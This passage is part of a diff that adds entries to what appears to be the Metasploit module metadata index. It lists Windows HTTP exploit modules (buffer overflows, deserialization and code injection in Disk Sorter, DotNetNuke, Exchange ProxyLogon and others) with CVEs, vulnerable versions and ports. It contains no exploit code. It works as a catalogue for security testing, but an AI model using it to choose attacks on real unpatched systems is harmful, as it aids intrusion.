"name": "Disk Sorter Enterprise GET Buffer Overflow", + "fullname": "exploit/windows/http/disksorter_bof", + "aliases": [], + "rank": 500, + "disclosure_date": "2017-03-15", + "type": "exploit", + "author": [ + "Daniel Teixeira" + ], + "description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of Disk Sorter Enterprise v9.5.12, caused by\n improper bounds checking of the request path in HTTP GET requests\n sent to the built-in web server. This module has been tested\n successfully on Windows 7 SP1 x86.", + "references": [ + "CVE-2017-7230" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Disk Sorter Enterprise v9.5.12" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/disksorter_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/disksorter_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/dlink_central_wifimanager_rce": { + "name": "D-Link Central WiFi Manager CWM(100) RCE", + "fullname": "exploit/windows/http/dlink_central_wifimanager_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2019-07-09", + "type": "exploit", + "author": [ + "M3 ", + "Redouane NIBOUCHA " + ], + "description": "This module exploits a PHP code injection vulnerability in D-Link Central WiFi Manager CWM(100)\n versions below `v1.03R0100_BETA6`. The vulnerability exists in the\n username cookie, which is passed to `eval()` without being sanitized.\n Dangerous functions are not disabled by default, which makes it possible\n to get code execution on the target.", + "references": [ + "CVE-2019-13372", + "URL-https://unh3x.github.io/2019/02/21/D-link-(CWM-100)-Multiple-Vulnerabilities/" + ], + "platform": "PHP", + "arch": "php", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2023-02-10 18:04:31 +0000", + "path": "/modules/exploits/windows/http/dlink_central_wifimanager_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/dlink_central_wifimanager_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/dnn_cookie_deserialization_rce": { + "name": "DotNetNuke Cookie Deserialization Remote Code Excecution", + "fullname": "exploit/windows/http/dnn_cookie_deserialization_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2017-07-20", + "type": "exploit", + "author": [ + "Jon Park", + "Jon Seigel" + ], + "description": "This module exploits a deserialization vulnerability in DotNetNuke (DNN) versions 5.0.0 to 9.3.0-RC.\n Vulnerable versions store profile information for users in the DNNPersonalization cookie as XML.\n The expected structure includes a \"type\" attribute to instruct the server which type of object to create on deserialization.\n The cookie is processed by the application whenever it attempts to load the current user's profile data.\n This occurs when DNN is configured to handle 404 errors with its built-in error page (default configuration).\n An attacker can leverage this vulnerability to execute arbitrary code on the system.", + "references": [ + "CVE-2017-9822", + "CVE-2018-15811", + "CVE-2018-15812", + "CVE-2018-18325", + "CVE-2018-18326", + "URL-https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf", + "URL-https://googleprojectzero.blogspot.com/2017/04/exploiting-net-managed-dcom.html", + "URL-https://github.com/pwntester/ysoserial.net" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic", + "v5.0 - v9.0.0", + "v9.0.1 - v9.1.1", + "v9.2.0 - v9.2.1", + "v9.2.2 - v9.3.0-RC" + ], + "mod_time": "2024-06-18 09:23:41 +0000", + "path": "/modules/exploits/windows/http/dnn_cookie_deserialization_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/dnn_cookie_deserialization_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/dup_scout_enterprise_login_bof": { + "name": "Dup Scout Enterprise Login Buffer Overflow", + "fullname": "exploit/windows/http/dup_scout_enterprise_login_bof", + "aliases": [], + "rank": 500, + "disclosure_date": "2017-11-14", + "type": "exploit", + "author": [ + "sickness", + "Chris Higgins", + "bcoles " + ], + "description": "This module exploits a stack buffer overflow in Dup Scout Enterprise\n versions <= 10.0.18. The buffer overflow exists via the web interface\n during login. This gives NT AUTHORITY\\SYSTEM access.\n\n This module has been tested successfully on Dup Scout Enterprise\n versions:\n\n 9.9.14 on Windows 7 SP1 (x64);\n 9.9.14 on Windows XP SP0 (x64);\n 10.0.18 on Windows 7 SP1 (x64);\n 10.0.18 on Windows XP SP0 (x86); and\n 10.0.18 on Windows 10 (1909) (x64).", + "references": [ + "CVE-2017-13696", + "CWE-121", + "EDB-42557", + "EDB-43145", + "EDB-40832" + ], + "platform": "Windows", + "arch": "x86", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic", + "Dup Scout Enterprise 9.9.14 (x86)", + "Dup Scout Enterprise 10.0.18 (x86)" + ], + "mod_time": "2021-02-25 17:14:25 +0000", + "path": "/modules/exploits/windows/http/dup_scout_enterprise_login_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/dup_scout_enterprise_login_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/dupscts_bof": { + "name": "Dup Scout Enterprise GET Buffer Overflow", + "fullname": "exploit/windows/http/dupscts_bof", + "aliases": [], + "rank": 500, + "disclosure_date": "2017-03-15", + "type": "exploit", + "author": [ + "vportal", + "Daniel Teixeira", + "bcoles " + ], + "description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of Dup Scout Enterprise versions <= 10.0.18,\n caused by improper bounds checking of the request path in HTTP GET\n requests sent to the built-in web server which can be leveraged\n to execute arbitrary code in the context of NT AUTHORITY\\SYSTEM.\n\n This module supports x86 versions of Dup Scout Enterprise and x86\n Windows operating systems only and has been tested successfully on\n Windows 7 SP1 (x86) and Windows XP SP0 (x86).", + "references": [ + "CVE-2017-13696", + "CWE-121", + "EDB-42557", + "EDB-49217" + ], + "platform": "Windows", + "arch": "x86", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic", + "Dup Scout Enterprise v8.3.16 (x86)", + "Dup Scout Enterprise v8.4.16 (x86)", + "Dup Scout Enterprise v9.0.28 (x86)", + "Dup Scout Enterprise v9.1.14 (x86)", + "Dup Scout Enterprise v9.5.14 (x86)", + "Dup Scout Enterprise v9.9.14 (x86)", + "Dup Scout Enterprise v10.0.18 (x86)" + ], + "mod_time": "2021-02-25 17:12:27 +0000", + "path": "/modules/exploits/windows/http/dupscts_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/dupscts_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/easychatserver_seh": { + "name": "Easy Chat Server User Registeration Buffer Overflow (SEH)", + "fullname": "exploit/windows/http/easychatserver_seh", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-10-09", + "type": "exploit", + "author": [ + "Marco Rivoli", + "Aitezaz Mohsin" + ], + "description": "This module exploits a buffer overflow during user registration in Easy Chat Server software.", + "references": [ + "EDB-42155" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Easy Chat Server 2.0 to 3.1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/easychatserver_seh.rb", + "is_install_path": true, + "ref_name": "windows/http/easychatserver_seh", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/easyfilesharing_post": { + "name": "Easy File Sharing HTTP Server 7.2 POST Buffer Overflow", + "fullname": "exploit/windows/http/easyfilesharing_post", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-06-12", + "type": "exploit", + "author": [ + "bl4ck h4ck3r", + "Marco Rivoli " + ], + "description": "This module exploits a POST buffer overflow in the Easy File Sharing FTP Server 7.2 software.", + "references": [ + "EDB-42186" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Easy File Sharing 7.2 HTTP" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/easyfilesharing_post.rb", + "is_install_path": true, + "ref_name": "windows/http/easyfilesharing_post", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/easyfilesharing_seh": { + "name": "Easy File Sharing HTTP Server 7.2 SEH Overflow", + "fullname": "exploit/windows/http/easyfilesharing_seh", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-12-02", + "type": "exploit", + "author": [ + "Starwarsfan2099 " + ], + "description": "This module exploits a SEH overflow in the Easy File Sharing FTP Server 7.2 software.", + "references": [ + "EDB-39008" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Easy File Sharing 7.2 HTTP" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/easyfilesharing_seh.rb", + "is_install_path": true, + "ref_name": "windows/http/easyfilesharing_seh", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/easyftp_list": { + "name": "EasyFTP Server list.html path Stack Buffer Overflow", + "fullname": "exploit/windows/http/easyftp_list", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-02-18", + "type": "exploit", + "author": [ + "ThE g0bL!N", + "jduck " + ], + "description": "This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11\n and earlier. EasyFTP fails to check input size when parsing the 'path' parameter\n supplied to an HTTP GET request, which leads to a stack based buffer overflow.\n EasyFTP allows anonymous access by default; valid credentials are typically\n unnecessary to exploit this vulnerability.\n\n After version 1.7.0.12, this package was renamed \"UplusFtp\".\n\n Due to limited space, as well as difficulties using an egghunter, the use of\n staged, ORD, and/or shell payloads is recommended.", + "references": [ + "OSVDB-66614", + "EDB-11500" + ], + "platform": "Windows", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows XP SP3 - Easy FTP Server Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/easyftp_list.rb", + "is_install_path": true, + "ref_name": "windows/http/easyftp_list", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/edirectory_host": { + "name": "Novell eDirectory NDS Server Host Header Overflow", + "fullname": "exploit/windows/http/edirectory_host", + "aliases": [], + "rank": 500, + "disclosure_date": "2006-10-21", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Novell eDirectory 8.8.1.\n The web interface does not validate the length of the\n HTTP Host header prior to using the value of that header in an\n HTTP redirect.", + "references": [ + "CVE-2006-5478", + "OSVDB-29993", + "BID-20655" + ], + "platform": "Windows", + "arch": "", + "rport": 8028, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Novell eDirectory 8.8.1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/edirectory_host.rb", + "is_install_path": true, + "ref_name": "windows/http/edirectory_host", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/edirectory_imonitor": { + "name": "eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow", + "fullname": "exploit/windows/http/edirectory_imonitor", + "aliases": [], + "rank": 500, + "disclosure_date": "2005-08-11", + "type": "exploit", + "author": [ + "Unknown", + "Matt Olney " + ], + "description": "This module exploits a stack buffer overflow in eDirectory 8.7.3\n iMonitor service. This vulnerability was discovered by Peter\n Winter-Smith of NGSSoftware.\n\n NOTE: repeated exploitation attempts may cause eDirectory to crash. It does\n not restart automatically in a default installation.", + "references": [ + "CVE-2005-2551", + "OSVDB-18703", + "BID-14548" + ], + "platform": "Windows", + "arch": "", + "rport": 8008, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows (ALL) - eDirectory 8.7.3 iMonitor" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/edirectory_imonitor.rb", + "is_install_path": true, + "ref_name": "windows/http/edirectory_imonitor", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/efs_easychatserver_username": { + "name": "EFS Easy Chat Server Authentication Request Handling Buffer Overflow", + "fullname": "exploit/windows/http/efs_easychatserver_username", + "aliases": [], + "rank": 500, + "disclosure_date": "2007-08-14", + "type": "exploit", + "author": [ + "LSO ", + "bcoles " + ], + "description": "This module exploits a stack buffer overflow in EFS Software Easy Chat\n Server versions 2.0 to 3.1. By sending an overly long authentication\n request, an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2004-2466", + "OSVDB-7416", + "OSVDB-106841", + "BID-25328" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Targeting", + "Easy Chat Server 2.0", + "Easy Chat Server 2.1 - 3.1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/efs_easychatserver_username.rb", + "is_install_path": true, + "ref_name": "windows/http/efs_easychatserver_username", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/efs_fmws_userid_bof": { + "name": "Easy File Management Web Server Stack Buffer Overflow", + "fullname": "exploit/windows/http/efs_fmws_userid_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-05-20", + "type": "exploit", + "author": [ + "superkojiman", + "Julien Ahrens", + "TecR0c " + ], + "description": "Easy File Management Web Server v4.0 and v5.3 contains a stack buffer\n overflow condition that is triggered as user-supplied input is not\n properly validated when handling the UserID cookie. This may allow a\n remote attacker to execute arbitrary code.", + "references": [ + "CVE-2014-3791", + "OSVDB-107241", + "EDB-33610", + "BID-67542", + "URL-http://www.cnnvd.org.cn/vulnerability/show/cv_id/2014050536", + "URL-http://www.web-file-management.com/" + ], + "platform": "Windows", + "arch": "x86", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Targeting", + "Efmws 5.3 Universal", + "Efmws 4.0 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/efs_fmws_userid_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/efs_fmws_userid_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/ektron_xslt_exec": { + "name": "Ektron 8.02 XSLT Transform Remote Code Execution", + "fullname": "exploit/windows/http/ektron_xslt_exec", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-10-16", + "type": "exploit", + "author": [ + "Rich Lundeen", + "juan vazquez ", + "Nicolas \"Nicob\" Gregoire" + ], + "description": "This module exploits a vulnerability in Ektron CMS 8.02 (before SP5). The\n vulnerability exists due to the insecure usage of XslCompiledTransform, using a\n XSLT controlled by the user. The module has been tested successfully on Ektron CMS\n 8.02 over Windows 2003 SP2, which allows to execute arbitrary code with NETWORK\n SERVICE privileges.", + "references": [ + "CVE-2012-5357", + "OSVDB-88107", + "URL-http://webstersprodigy.net/2012/10/25/cve-2012-5357cve-1012-5358-cool-ektron-xslt-rce-bugs/", + "URL-http://technet.microsoft.com/en-us/security/msvr/msvr12-016" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows 2003 SP2 / Ektron CMS400 8.02" + ], + "mod_time": "2020-09-22 02:56:51 +0000", + "path": "/modules/exploits/windows/http/ektron_xslt_exec.rb", + "is_install_path": true, + "ref_name": "windows/http/ektron_xslt_exec", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/ektron_xslt_exec_ws": { + "name": "Ektron 8.5, 8.7, 9.0 XSLT Transform Remote Code Execution", + "fullname": "exploit/windows/http/ektron_xslt_exec_ws", + "aliases": [], + "rank": 600, + "disclosure_date": "2015-02-05", + "type": "exploit", + "author": [ + "catatonicprime" + ], + "description": "Ektron 8.5, 8.7 <= sp1, 9.0 < sp1 have\nvulnerabilities in various operations within the ServerControlWS.asmx\nweb services. These vulnerabilities allow for RCE without authentication and\nexecute in the context of IIS on the remote system.", + "references": [ + "CVE-2015-0923", + "US-CERT-VU-377644", + "URL-http://www.websecuritywatch.com/xxe-arbitrary-code-execution-in-ektron-cms/" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows 2008 R2 / Ektron CMS400 8.5" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/ektron_xslt_exec_ws.rb", + "is_install_path": true, + "ref_name": "windows/http/ektron_xslt_exec_ws", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/ericom_access_now_bof": { + "name": "Ericom AccessNow Server Buffer Overflow", + "fullname": "exploit/windows/http/ericom_access_now_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-06-02", + "type": "exploit", + "author": [ + "Unknown", + "juan vazquez " + ], + "description": "This module exploits a stack based buffer overflow in Ericom AccessNow Server. The\n vulnerability is due to an insecure usage of vsprintf with user controlled data,\n which can be triggered with a malformed HTTP request. This module has been tested\n successfully with Ericom AccessNow Server 2.4.0.2 on Windows XP SP3 and Windows 2003\n Server SP2.", + "references": [ + "ZDI-14-160", + "CVE-2014-3913", + "BID-67777", + "URL-http://www.ericom.com/security-ERM-2014-610.asp" + ], + "platform": "Windows", + "arch": "x86", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Ericom AccessNow Server 2.4.0.2 / Windows [XP SP3 / 2003 SP2]" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/ericom_access_now_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/ericom_access_now_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/exchange_chainedserializationbinder_rce": { + "name": "Microsoft Exchange Server ChainedSerializationBinder RCE", + "fullname": "exploit/windows/http/exchange_chainedserializationbinder_rce", + "aliases": [ + "exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce" + ], + "rank": 600, + "disclosure_date": "2021-12-09", + "type": "exploit", + "author": [ + "pwnforsp", + "zcgonvh", + "Microsoft Threat Intelligence Center", + "Microsoft Security Response Center", + "peterjson", + "testanull", + "Grant Willcox", + "Spencer McIntyre", + "Markus Wulftange" + ], + "description": "This module exploits vulnerabilities within the ChainedSerializationBinder as used in\n Exchange Server 2019 CU10, Exchange Server 2019 CU11, Exchange Server 2016 CU21, and\n Exchange Server 2016 CU22 all prior to Mar22SU.\n\n Note that authentication is required to exploit these vulnerabilities.", + "references": [ + "CVE-2021-42321", + "URL-https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321", + "URL-https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-november-9-2021-kb5007409-7e1f235a-d41b-4a76-bcc4-3db90cd161e7", + "URL-https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2021-exchange-server-security-updates/ba-p/2933169", + "URL-https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398", + "URL-https://peterjson.medium.com/some-notes-about-microsoft-exchange-deserialization-rce-cve-2021-42321-110d04e8852", + "CVE-2022-23277", + "URL-https://codewhitesec.blogspot.com/2022/06/bypassing-dotnet-serialization-binders.html", + "URL-https://testbnull.medium.com/note-nhanh-v%E1%BB%81-binaryformatter-binder-v%C3%A0-cve-2022-23277-6510d469604c" + ], + "platform": "Windows", + "arch": "cmd, x86, x64", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Command", + "Windows Dropper", + "PowerShell Stager" + ], + "mod_time": "2022-08-17 17:36:31 +0000", + "path": "/modules/exploits/windows/http/exchange_chainedserializationbinder_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/exchange_chainedserializationbinder_rce", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "config-changes" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/exchange_ecp_dlp_policy": { + "name": "Microsoft Exchange Server DlpUtils AddTenantDlpPolicy RCE", + "fullname": "exploit/windows/http/exchange_ecp_dlp_policy", + "aliases": [], + "rank": 600, + "disclosure_date": "2021-01-12", + "type": "exploit", + "author": [ + "Leonard Rapp", + "Markus Vervier", + "Steven Seeley", + "Yasar Klawohn", + "wvu ", + "Spencer McIntyre" + ], + "description": "This vulnerability allows remote attackers to execute arbitrary code\n on affected installations of Exchange Server. Authentication is\n required to exploit this vulnerability. Additionally, the target user\n must have the \"Data Loss Prevention\" role assigned and an active\n mailbox.\n\n If the user is in the \"Compliance Management\" or greater \"Organization\n Management\" role groups, then they have the \"Data Loss Prevention\"\n role. Since the user who installed Exchange is in the \"Organization\n Management\" role group, they transitively have the \"Data Loss\n Prevention\" role.\n\n The specific flaw exists within the processing of the New-DlpPolicy\n cmdlet. The issue results from the lack of proper validation of\n user-supplied template data when creating a DLP policy. An attacker\n can leverage this vulnerability to execute code in the context of\n SYSTEM.\n\n Tested against Exchange Server 2016 CU19 on Windows Server 2016.", + "references": [ + "CVE-2020-16875", + "CVE-2020-17132", + "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16875", + "URL-https://support.microsoft.com/en-us/help/4577352/security-update-for-exchange-server-2019-and-2016", + "URL-https://srcincite.io/advisories/src-2020-0019/", + "URL-https://srcincite.io/pocs/cve-2020-16875.py.txt", + "URL-https://srcincite.io/pocs/cve-2020-16875.ps1.txt", + "URL-https://srcincite.io/blog/2021/01/12/making-clouds-rain-rce-in-office-365.html", + "URL-https://www.x41-dsec.de/security/advisory/exploit/research/2020/12/21/x41-microsoft-exchange-rce-dlp-bypass/" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Exchange Server <= 2016 CU19 and 2019 CU8" + ], + "mod_time": "2021-04-29 21:26:02 +0000", + "path": "/modules/exploits/windows/http/exchange_ecp_dlp_policy.rb", + "is_install_path": true, + "ref_name": "windows/http/exchange_ecp_dlp_policy", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "account-lockouts", + "config-changes", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/exchange_ecp_viewstate": { + "name": "Exchange Control Panel ViewState Deserialization", + "fullname": "exploit/windows/http/exchange_ecp_viewstate", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-02-11", + "type": "exploit", + "author": [ + "Spencer McIntyre" + ], + "description": "This module exploits a .NET serialization vulnerability in the\n Exchange Control Panel (ECP) web page. The vulnerability is due to\n Microsoft Exchange Server not randomizing the keys on a\n per-installation basis resulting in them using the same validationKey\n and decryptionKey values. With knowledge of these values, an attacker\n can craft a special ViewState to cause an OS command to be executed\n by NT_AUTHORITY\\SYSTEM using .NET deserialization.", + "references": [ + "CVE-2020-0688", + "URL-https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys" + ], + "platform": "Windows", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows (x86)", + "Windows (x64)", + "Windows (cmd)" + ], + "mod_time": "2020-08-21 10:13:45 +0000", + "path": "/modules/exploits/windows/http/exchange_ecp_viewstate.rb", + "is_install_path": true, + "ref_name": "windows/http/exchange_ecp_viewstate", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/exchange_proxylogon_rce": { + "name": "Microsoft Exchange ProxyLogon RCE", + "fullname": "exploit/windows/http/exchange_proxylogon_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2021-03-02", + "type": "exploit", + "author": [ + "Orange Tsai", + "Jang ( ", + "mekhalleh (RAMELLA Sébastien)", + "print(\"\")", + "lotusdll", + "Praetorian" + ], + "description": "This module exploit a vulnerability on Microsoft Exchange Server that\n allows an attacker bypassing the authentication, impersonating as the\n admin (CVE-2021-26855) and write arbitrary file (CVE-2021-27065) to get\n the RCE (Remote Code Execution).\n\n By taking advantage of this vulnerability, you can execute arbitrary\n commands on the remote Microsoft Exchange Server.\n\n This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012,\n Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009,\n Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).\n\n All components are vulnerable by default.", + "references": [ + "CVE-2021-26855", + "CVE-2021-27065", + "LOGO-https://proxylogon.com/images/logo.jpg", + "URL-https://proxylogon.com/", + "URL-http://aka.ms/exchangevulns", + "URL-https://www.praetorian.com/blog/reproducing-proxylogon-exploit", + "URL-https://testbnull.medium.com/ph%C3%A2n-t%C3%ADch-l%E1%BB%97-h%E1%BB%95ng-proxylogon-mail-exchange-rce-s%E1%BB%B1-k%E1%BA%BFt-h%E1%BB%A3p-ho%C3%A0n-h%E1%BA%A3o-cve-2021-26855-37f4b6e06265", + "URL-https://www.o2oxy.cn/3169.html", + "URL-https://github.com/praetorian-inc/proxylogon-exploit", + "URL-https://github.com/Zeop-CyberSec/proxylogon_writeup" + ], + "platform": "Windows", + "arch": "cmd, x64, x86", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Powershell", + "Windows Dropper", + "Windows Command" + ], + "mod_time": "2023-02-08 15:20:32 +0000", + "path": "/modules/exploits/windows/http/exchange_proxylogon_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/exchange_proxylogon_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ], + "AKA": [ + "ProxyLogon" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/exchange_proxynotshell_rce": { + "name": "Microsoft Exchange ProxyNotShell RCE", + "fullname": "exploit/windows/http/exchange_proxynotshell_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2022-09-28", + "type": "exploit", + "author": [ + "Orange Tsai", + 